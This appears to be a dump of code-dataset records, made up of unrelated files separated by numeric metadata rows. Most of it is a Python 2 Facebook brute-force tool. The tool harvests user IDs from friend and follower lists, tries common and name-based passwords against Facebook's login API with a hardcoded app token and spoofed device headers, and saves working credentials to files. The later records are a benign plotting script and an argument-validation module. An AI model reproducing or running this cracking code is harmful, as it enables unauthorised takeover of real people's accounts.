print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass4 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass4 + '\n')
ok.close()
oks.append(uid + pass4)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass4 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass4 + '\n')
cp.close()
cps.append(uid + pass4)
else:
pass5 = name.lower().split(' ')[1] + '123'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass5,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass5 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass5 + '\n')
ok.close()
oks.append(uid + pass5)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass5 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass5 + '\n')
cp.close()
cps.append(uid + pass5)
else:
pass6 = name.lower().split(' ')[1] + '12'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass6,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass6 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass6 + '\n')
ok.close()
oks.append(uid + pass6)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass6 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass6 + '\n')
cp.close()
cps.append(uid + pass6)
else:
pass7 = name.lower()
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass7,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass7 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass7 + '\n')
ok.close()
oks.append(uid + pass7)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass7 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass7 + '\n')
cp.close()
cps.append(uid + pass7)
else:
pass8 = name.lower().split(' ')[0] + name.lower().split(' ')[1]
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass8,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass8 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass8 + '\n')
ok.close()
oks.append(uid + pass8)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass8 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass8 + '\n')
cp.close()
cps.append(uid + pass8)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print ''
linex()
print ''
print '\x1b[92;1m THE PROCESS HAS BEEN COMPLETED'
print '\x1b[93;1m TOTAL \x1b[92;1mOK\x1b[93;1m/\x1b[91;1mCP: ' + str(len(oks)) + '/' + str(len(cps))
print ''
linex()
print ''
raw_input('\x1b[93;1m PRESS ENTER TO BACK ')
menu()
def crack():
global token
os.system('clear')
try:
token = open('vau_token.txt', 'r').read()
except IOError:
print ''
print '\t\x1b[91;1m TOKEN NOT FOUND '
time.sleep(1)
fb_token()
os.system('clear')
logo()
print ''
print '\t\x1b[93;1m DIGIT PASS CRACKING'
print ''
print '\x1b[94;1m [1] CRACK PUBLIC ID'
print '\x1b[93;1m [2] CRACK FOLLOWERS'
print '\x1b[92;1m [3] CRACK FILE'
print ''
crack_select()
def crack_select():
select = raw_input('\x1b[92;1m CHOOSE : ')
id = []
oks = []
cps = []
if select == '1':
os.system('clear')
logo()
print ''
print '\t\x1b[93;1m DIGIT PASS CRACKING'
print ''
try:
id_limit = int(raw_input('\x1b[93;1m ENTER LIMIT (\x1b[91;1m5 MAX\x1b[93;1m): \x1b[92;1m'))
print ''
except:
id_limit = 1
for t in range(id_limit):
t += 1
idt = raw_input('\x1b[93;1m INPUT PUBLIC ID (\x1b[92;1m%s\x1b[93;1m) : \x1b[92;1m' % t)
try:
for i in requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token).json()['data']:
uid = i['id'].encode('utf-8')
na = i['name'].encode('utf-8')
id.append(uid + '|' + na)
except KeyError:
print '\x1b[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE'
print '\x1b[94;1m TOTAL IDS : \x1b[0;92m%s\x1b[0;97m' % len(id)
time.sleep(3)
elif select == '2':
os.system('clear')
logo()
print ''
print '\t\x1b[93;1m DIGIT PASS CRACKING'
print ''
try:
id_limit = int(raw_input('\x1b[93;1m ENTER LIMIT (\x1b[91;1m5 MAX\x1b[93;1m): \x1b[92;1m'))
print ''
except:
id_limit = 1
for t in range(id_limit):
t += 1
idt = raw_input('\x1b[93;1m INPUT FOLLOWER ID (\x1b[92;1m%s\x1b[93;1m) : \x1b[92;1m' % t)
try:
for i in requests.get('https://graph.facebook.com/' + idt + '/subscribers?access_token=' + token + '&limit=999999').json()['data']:
uid = i['id'].encode('utf-8')
na = i['name'].encode('utf-8')
id.append(uid + '|' + na)
except KeyError:
print '\x1b[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE'
print '\x1b[94;1m TOTAL IDS : \x1b[0;92m%s\x1b[0;97m' % len(id)
time.sleep(3)
elif select == '3':
os.system('clear')
logo()
print ''
print '\t\x1b[93;1m DIGIT PASS CRACKING'
print ''
filelist = raw_input('\x1b[92;1m INPUT FILE: ')
try:
for line in open(filelist, 'r').readlines():
id.append(line.strip())
except IOError:
print '\t\x1b[91;1m REQUESTED FILE NOT FOUND'
print ''
raw_input('\x1b[93;1m PRESS ENTER TO BACK')
crack()
if select == '0':
menu()
else:
print ''
print '\t\x1b[91;1m SELECT VALID OPTION'
print ''
crack_select()
os.system('clear')
logo()
print ''
print '\x1b[93;1m TOTAL IDS : \x1b[92;1m' + str(len(id))
print '\x1b[92;1m BRUTE HAS BEEN STARTED\x1b[0m'
print '\x1b[94;1m WAIT AND SEE \x1b[92;1m\xe2\x9c\x98\x1b[91;1m\xe2\x9c\x98\x1b[0m'
linex()
def main(arg):
user = arg
(uid, name) = user.split('|')
_azimua = random.choice([
'Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/275.0.0.49.127;]',
'[FBAN/FB4A;FBAV/246.0.0.49.121;FBBV/181448449;FBDM/{density=1.5,width=540,height=960};FBLC/en_US;FBRV/183119516;FBCR/TM;FBMF/vivo;FBBD/vivo;FBPN/com.facebook.katana;FBDV/vivo 1606;FBSV/6.0.1;FBOP/1;FBCA/armeabi-v7a:armeabi;]',
'Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-J320F Build/LMY47V) [FBAN/FB4A;FBAV/43.0.0.29.147;FBPN/com.facebook.katana;FBLC/en_GB;FBBV/14274161;FBCR/Tele2 LT;FBMF/samsung;FBBD/samsung;FBDV/SM-J320F;FBSV/5.0;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=1920};FB_FW/1;]',
'Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/305.1.0.40.120;]',
'Mozilla/5.0 (Linux; Android 10; REALME RMX1911 Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 AlohaBrowser/2.20.3',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E216 [FBAN/FBIOS;FBAV/170.0.0.60.91;FBBV/105964764;FBDV/iPhone10,1;FBMD/iPhone;FBSN/iOS;FBSV/11.3;FBSS/2;FBCR/Sprint;FBID/phone;FBLC/en_US;FBOP/5;FBRV/106631002]',
'Mozilla/5.0 (Linux; Android 7.1.1; ASUS Chromebook Flip C302 Build/R70-11021.56.0; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]'])
try:
pass1 = '102030'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass1,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass1 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass1 + '\n')
ok.close()
oks.append(uid + pass1)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass1 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass1 + '\n')
cp.close()
cps.append(uid + pass1)
else:
pass2 = '223344'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass2,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass2 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass2 + '\n')
ok.close()
oks.append(uid + pass2)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass2 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass2 + '\n')
cp.close()
cps.append(uid + pass2)
else:
pass3 = '556677'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass3,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass3 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass3 + '\n')
ok.close()
oks.append(uid + pass3)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass3 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass3 + '\n')
cp.close()
cps.append(uid + pass3)
else:
pass4 = '786786'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass4,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass4 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass4 + '\n')
ok.close()
oks.append(uid + pass4)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass4 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass4 + '\n')
cp.close()
cps.append(uid + pass4)
else:
pass5 = '123456'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass5,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass5 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass5 + '\n')
ok.close()
oks.append(uid + pass5)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass5 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass5 + '\n')
cp.close()
cps.append(uid + pass5)
else:
pass6 = '112233'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass6,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass6 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass6 + '\n')
ok.close()
oks.append(uid + pass6)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass6 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass6 + '\n')
cp.close()
cps.append(uid + pass6)
else:
pass7 = '123356789'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass7,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass7 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass7 + '\n')
ok.close()
oks.append(uid + pass7)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass7 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass7 + '\n')
cp.close()
cps.append(uid + pass7)
except:
pass
p = ThreadPool()
p.map(main, id)
print ''
linex()
print ''
print '\x1b[92;1m THE PROCESS HAS BEEN COMPLETED'
print '\x1b[93;1m TOTAL \x1b[92;1mOK\x1b[93;1m/\x1b[91;1mCP: ' + str(len(oks)) + '/' + str(len(cps))
print ''
linex()
print ''
raw_input('\x1b[93;1m PRESS ENTER TO BACK ')
menu()
if __name__ == '__main__':
main()
| 49.492809 | 446 | 0.43308 | 5,312 | 51,621 | 4.154179 | 0.093185 | 0.013051 | 0.028278 | 0.027552 | 0.874111 | 0.865501 | 0.853945 | 0.845743 | 0.842389 | 0.842389 | 0 | 0.106601 | 0.423936 | 51,621 | 1,042 | 447 | 49.540307 | 0.635471 | 0.001472 | 0 | 0.861024 | 1 | 0.037618 | 0.335286 | 0.11096 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.136886 | 0.024033 | null | null | 0.149425 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 10 |
7e874e5206ecb0a346d425c4df20df9b08d8fca3 | 2,382 | py | Python | test/plot.py | vibhatha/PSGDSVMPY | 69ed88f5db8d9a250ee944f44b88e54351f8696f | [
"Apache-2.0"
] | null | null | null | test/plot.py | vibhatha/PSGDSVMPY | 69ed88f5db8d9a250ee944f44b88e54351f8696f | [
"Apache-2.0"
] | null | null | null | test/plot.py | vibhatha/PSGDSVMPY | 69ed88f5db8d9a250ee944f44b88e54351f8696f | [
"Apache-2.0"
] | null | null | null | from matplotlib import pyplot as plt
import numpy as np
# a9a = np.array([1, 1.803005008, 3.176470588, 5.510204082, 8.925619835])
# cod_rna = np.array([1, 1.872355186, 3.240096038, 5.536410256, 8.907590759])
# ijcnn1 = np.array([1, 1.667803215, 3.158671587, 5.558441558, 8.84754522])
# webspam = np.array([1, 1.828194014, 3.342995169, 5.478476002, 10.59521531])
# phishing = np.array([1, 1.934593023, 3.352644836, 6.278301887, 10.23846154])
# w8a = np.array([1, 1.757307589, 2.9359319, 5.548687553, 10.15968992])
#
# ideal = np.array([1,2,4,8,16])
# cores = [1,2,4,8,16]
# fig, ax = plt.subplots()
# ax.plot(cores, a9a, label='a9a')
# ax.plot(cores, cod_rna, label='cod_rna')
# ax.plot(cores, ijcnn1, label='ijcnn1')
# ax.plot(cores, webspam, label='webspam')
# ax.plot(cores, phishing, label='phishing')
# ax.plot(cores, w8a, label='w8a')
# ax.plot(cores, ideal, label='Ideal')
# legend = ax.legend(loc='upper right', shadow=True, fontsize='xx-small')
#
# plt.xlabel('cores')
# plt.ylabel('Speed Up')
# plt.title('Speed Up vs Cores')
# plt.show()
#a9a = np.array([1, 1.803005008, 3.176470588, 5.510204082, 8.925619835])
#cod_rna = np.array([1, 1.872355186, 3.240096038, 5.536410256, 8.907590759])
#ijcnn1 = np.array([1, 1.667803215, 3.158671587, 5.558441558, 8.84754522])
#webspam = np.array([1, 1.61528361, 2.853808771, 4.997688509, 7.343883485])
#phishing = np.array([1, 1.934593023, 3.352644836, 6.278301887, 10.23846154])
#w8a = np.array([1, 1.757307589, 2.9359319, 5.548687553, 10.15968992])
webspam_py = np.array([1, 1.913528743, 3.75819667, 7.409385514, 12.64104837])
webspam_java = np.array([1, 1.38446411, 1.916391211, 2.782608696, 3.862068966])
#webspam_c = np.array([1, 1.279020979, 1.812685828, 2.685756241, 4.11011236])
ideal = np.array([1,2,4,8,16])
cores = [1,2,4,8,16]
fig, ax = plt.subplots()
#ax.plot(cores, a9a, label='a9a')
#ax.plot(cores, cod_rna, label='cod_rna')
#ax.plot(cores, ijcnn1, label='ijcnn1')
ax.plot(cores, webspam_py, label='python')
ax.plot(cores, webspam_java, label='java')
#ax.plot(cores, webspam_c, label='java')
#ax.plot(cores, phishing, label='phishing')
#ax.plot(cores, w8a, label='w8a')
ax.plot(cores, ideal, label='Ideal')
legend = ax.legend(loc='upper right', shadow=True, fontsize='xx-small')
plt.xlabel('Cores')
plt.ylabel('Speed Up')
plt.title('Single Node Core Level Speed Up - [Covtype, Split:0.80, 510K, 54F]')
plt.show()
| 41.789474 | 79 | 0.690176 | 394 | 2,382 | 4.142132 | 0.263959 | 0.072917 | 0.083333 | 0.082721 | 0.740809 | 0.723039 | 0.723039 | 0.723039 | 0.723039 | 0.723039 | 0 | 0.306935 | 0.104114 | 2,382 | 56 | 80 | 42.535714 | 0.457826 | 0.706549 | 0 | 0 | 0 | 0 | 0.170695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0e19352201dcde07624412b654ca0ad3d195e009 | 1,310 | py | Python | checkarg/number.py | felipebrumpereira/checkarg | 1dad052af183def92a7213add68dc91fe7f4462c | [
"MIT"
] | null | null | null | checkarg/number.py | felipebrumpereira/checkarg | 1dad052af183def92a7213add68dc91fe7f4462c | [
"MIT"
] | null | null | null | checkarg/number.py | felipebrumpereira/checkarg | 1dad052af183def92a7213add68dc91fe7f4462c | [
"MIT"
] | null | null | null | from typing import Union
from checkarg.exceptions import ArgumentOutOfRangeException


def is_greater(
    value: Union[int, float],
    condition_value: Union[int, float],
    argument_name: str = None,
    exception: Exception = None,
):
    # Strict check: value must be greater than condition_value.
    if value <= condition_value:
        raise ArgumentOutOfRangeException(
            argument_name
        ) if exception is None else exception


def is_lower(
    value: Union[int, float],
    condition_value: Union[int, float],
    argument_name: str = None,
    exception: Exception = None,
):
    # Strict check: value must be lower than condition_value.
    if value >= condition_value:
        raise ArgumentOutOfRangeException(
            argument_name
        ) if exception is None else exception


def is_greater_or_equals(
    value: Union[int, float],
    condition_value: Union[int, float],
    argument_name: str = None,
    exception: Exception = None,
):
    if value < condition_value:
        raise ArgumentOutOfRangeException(
            argument_name
        ) if exception is None else exception


def is_lower_or_equals(
    value: Union[int, float],
    condition_value: Union[int, float],
    argument_name: str = None,
    exception: Exception = None,
):
    if value > condition_value:
        raise ArgumentOutOfRangeException(
            argument_name
        ) if exception is None else exception
| 25.192308 | 59 | 0.674809 | 145 | 1,310 | 5.931034 | 0.172414 | 0.093023 | 0.12093 | 0.167442 | 0.889535 | 0.889535 | 0.889535 | 0.889535 | 0.889535 | 0.889535 | 0 | 0 | 0.254198 | 1,310 | 51 | 60 | 25.686275 | 0.880246 | 0 | 0 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.047619 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
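A minimal, self-contained usage sketch of the guard-clause pattern in `checkarg/number.py` above. The local `ArgumentOutOfRangeException` class is a stand-in for `checkarg.exceptions.ArgumentOutOfRangeException` so the snippet runs without the package installed, and the strict `<=` comparison is an assumption about the intended semantics of `is_greater`:

```python
from typing import Optional, Union


class ArgumentOutOfRangeException(Exception):
    """Stand-in for checkarg.exceptions.ArgumentOutOfRangeException."""


def is_greater(
    value: Union[int, float],
    condition_value: Union[int, float],
    argument_name: Optional[str] = None,
    exception: Optional[Exception] = None,
):
    # Guard clause: reject values that are not strictly greater than the threshold,
    # raising either the library exception or a caller-supplied one.
    if value <= condition_value:
        raise ArgumentOutOfRangeException(argument_name) if exception is None else exception


is_greater(10, 5)  # passes silently
try:
    is_greater(3, 5, argument_name="timeout")
except ArgumentOutOfRangeException as exc:
    print("rejected argument:", exc)
```

Passing `exception=` swaps in a caller-defined error, which keeps validation call sites one line long while still letting each caller control its error type.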
0e6ec3ae46074c87e93b3d03ef650f90cddc1525 | 4,470 | py | Python | acti/dyrelu.py | CarnoZhao/utils | 5b664967724af97fb50a416268f3e4c8a17e7103 | [
"MIT"
] | 2 | 2021-03-24T14:02:50.000Z | 2021-06-10T06:55:14.000Z | acti/dyrelu.py | CarnoZhao/utils | 5b664967724af97fb50a416268f3e4c8a17e7103 | [
"MIT"
] | null | null | null | acti/dyrelu.py | CarnoZhao/utils | 5b664967724af97fb50a416268f3e4c8a17e7103 | [
"MIT"
